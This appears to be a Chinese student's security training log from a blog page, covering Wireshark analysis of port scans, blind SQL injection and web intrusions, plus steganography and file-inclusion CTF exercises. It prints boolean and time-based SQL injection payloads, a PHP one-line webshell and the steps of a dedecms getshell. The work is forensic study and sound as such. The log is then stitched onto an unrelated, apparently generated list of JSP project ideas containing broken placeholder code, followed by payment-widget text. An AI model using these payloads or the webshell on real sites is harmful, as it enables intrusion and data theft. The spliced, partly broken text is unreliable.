实训记录-周二

Day-2 流量分析实战+隐写

上午-流量分析实战

1 SYN半链接攻击流量分析

打开电线鲨鱼
分析流量包

可见大量SYN半连接端口号都不一样
所以攻击者在扫描网站开放端口
过滤条件:
ip.src == 192.168.177.145 and tcp.flags.syn == 1 and tcp.flags.ack == 1

2 SQL注入攻击流量分析一

过滤条件:
id=1’and if(length(database())=0,1,0)–+
id=1’and if(ascii(substr(database(),7,1))>79,1,0) --+
采用布尔盲注

you are in …

3 SQL注入攻击流量分析二

http and (ip.src192.168.177.1 or ip.dst 192.168.177.145)

id=1’ and if(length(database())=1,sleep(5),0) --+
id=1’ and if((select%20substring(database(),1,1))=“a”,sleep(5),1) --+

更高级的时间盲注

4 Web入侵溯源一

发现一堆
http.response.code == 404
明显是扫后台呢
head 请求,对网站进行目录爆破

踪流->http 流,找到↓
admin_name=admin&admin_pwd=密码&submit=%B5%C7%C2%BC&act=do_login
中的admin_pwd字段
攻击者对其进行了爆破

然后发现代码
@eval($_POST['x']);

a 首先,黑客通过目录扫描,获取了后台管理地址。
b 然后通过弱口令爆破,获取到了 admin 账户的密码,登录了后台。
c 在对后台功能进行一番探索之后,找到了 admin/tpl_manage.php 文件可以通过目录遍历查看并修改任意文件的内容。由此通过修改 index.php 的内容,插入了 php 一句话木马。
d 最后,黑客向 index 页面的一句话木马传递 phpinfo() 确认了一句话写入成功。

5 Web入侵溯源二

1、使用 Wireshark 打开 webattack2.pcap 数据包。
2、因为是对 web 攻击进行溯源分析 ,所以我们只需要关注 http 协议的数据包 。所以在显示过滤器中输入 http 过滤出 http 协议的数据包。
搜索条件:
http and ((ip.src==192.168.177.1 and ip.dst==192.168.177.145) or (ip.src==192.168.177.145 and ip.dst==192.168.177.1))
3、通过对数据包的观察,前面部分的数据包为正常访问的数据包。
4、从数据包编号为 1544 的包开始,开始出现 head 请求,以及大量的 404 响应,推测黑客正在对网站进行目录爆破
5、爆破完成后,流量中出现对 /dede/login.php 的访问记录。因为 dede 为 dedecms 的默认后台地址。此时黑客可能已经获取到了后台路径,且开始尝试登陆。
6、查看 POST 数据包的内容,发现提交内容的用户名为 admin,密码为 123456 等弱口令,猜测黑客此时在进行弱口令测试。
7、随后,出现了 index.php访问记录,观察前一个数据包的返回内容,其返回的内容为 JS 跳转,跳转到 index 页面,猜测此时黑客可能已经登录成功。
8、之后黑客访问了 dede/ad_add.php 这个页面,dedecms 在 5.7 版本,这个页面存在 getshell漏洞,黑客应该是想利用此漏洞来进行 getshell。查看黑客此次 POST 提交的内容。发现了一句话木马。可以证实黑客是进行了 getshell 的操作。
9、之后出现了大量的对 ad_js.php 页面的 POST 请求,查看请求的内容,为 php 代码。此时黑客可能已经成功 getshell,使用菜刀工具对 webshell 进行了连接。

下午-流量分析与二进制ctf取证

密码追踪

Wireshark
过滤httpftp
使用数据流分析即可
好像没啥好说的

数据包文件分析

流量分析找到密文

流量数据隐写分析

藏在图片里

数据包中的线索

按长度排序
找到上传的图片,里面藏了密码
在流量文件里分离出zip加密文件,里面藏了flag

文件分析(隐写)

比较简单了
主要就是flag藏在图片二进制文件里了
然后就是png图片改大小以及base32编码
最后就是爆破一个压缩包

晚上-写了一会ctf的题

大部分都是简单题,基本上会基础操作都能想出来。
有一道题是:

highlight_file(__FILE__);

if(isset($_GET['file'])) {
    $str = $_GET['file'];

    include $_GET['file'];
}

存在文件包含漏洞
所以在网址后传参%file=/flag
即可得到flag

### JSP实训项目的背景与意义 JSP(Java Server Pages)是一种用于构建动态网页的技术,能够实现跨平台的应用开发[^1]。对于物理与电子信息学院的学生而言,通过实际项目训练可以加深对JSP的理解并提升实践能力。 以下是几个适合物理与电子信息学院学生的JSP实训项目示例: --- ### 1. **实验室设备管理系统** 该系统旨在帮助物理与电子信息学院管理其实验室中的各种设备资源。主要功能包括: - 设备信息录入、查询和修改。 - 借还记录管理。 - 用户权限控制(管理员、教师、学生角色区分)。 #### 技术要点 - 使用数据库存储设备信息以及借还记录- 利用Spring Boot框架简化后台逻辑处理[^3]。 - 结合MyBatis完成数据持久化操作。 ```java // 示例代码:设备实体类定义 public class Equipment { private int id; private String name; private String status; // Getter and Setter methods... } ``` --- ### 2. **科研成果展示网站** 此项目专注于为学院提供一个在线发布最新研究成果的平台。核心模块有: - 成果上传与审核流程。 - 多媒体资料支持(图片、视频等形式)。 - 访问统计分析。 #### 关键特性 - 动态生成HTML页面以适应不同类型的科研内容显示需求。 - 集成第三方API增强交互体验,比如图表绘制工具ECharts。 ```javascript // ECharts配置实例 var chartDom = document.getElementById('main'); var myChart = echarts.init(chartDom); var option = { title: { text: '访问量趋势' }, tooltip: {}, xAxis: { data: ['周一', '周二', ..., '周日'] }, yAxis: {}, series: [{ type: 'line', data: [10, 20, ... ,80]}] }; myChart.setOption(option); ``` --- ### 3. **教学资源共享平台** 创建一个供师生分享课件、讲义及其他学习材料的地方。特色如下: - 文件分类导航便于查找特定学科领域的内容。 - 支持评论交流促进知识传播。 - 安全机制防止未授权下载行为发生。 #### 开发建议 - 运用Bootstrap美化前端界面布局。 - 考虑到可能涉及大量文件传输情况,优化服务器性能成为必要环节之一。 ```xml <!-- Bootstrap按钮样式 --> <button type="button" class="btn btn-primary">上传新文档</button> ``` --- ### 4. **实验预约服务平台** 允许学生提前预定所需使用的仪器时间槽位,减少排队等待现象。基本构成要素含括但不限于以下几个方面: - 时间段划分规则设定。 - 自动发送提醒邮件通知参与者具体安排详情。 - 数据可视化呈现预约热度分布状况以便调整策略。 #### 注意事项 - 确保系统的稳定性和可靠性,因为这直接影响用户体验满意度。 - 参考企业网络架构设计思路来规划整个解决方案部署环境[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值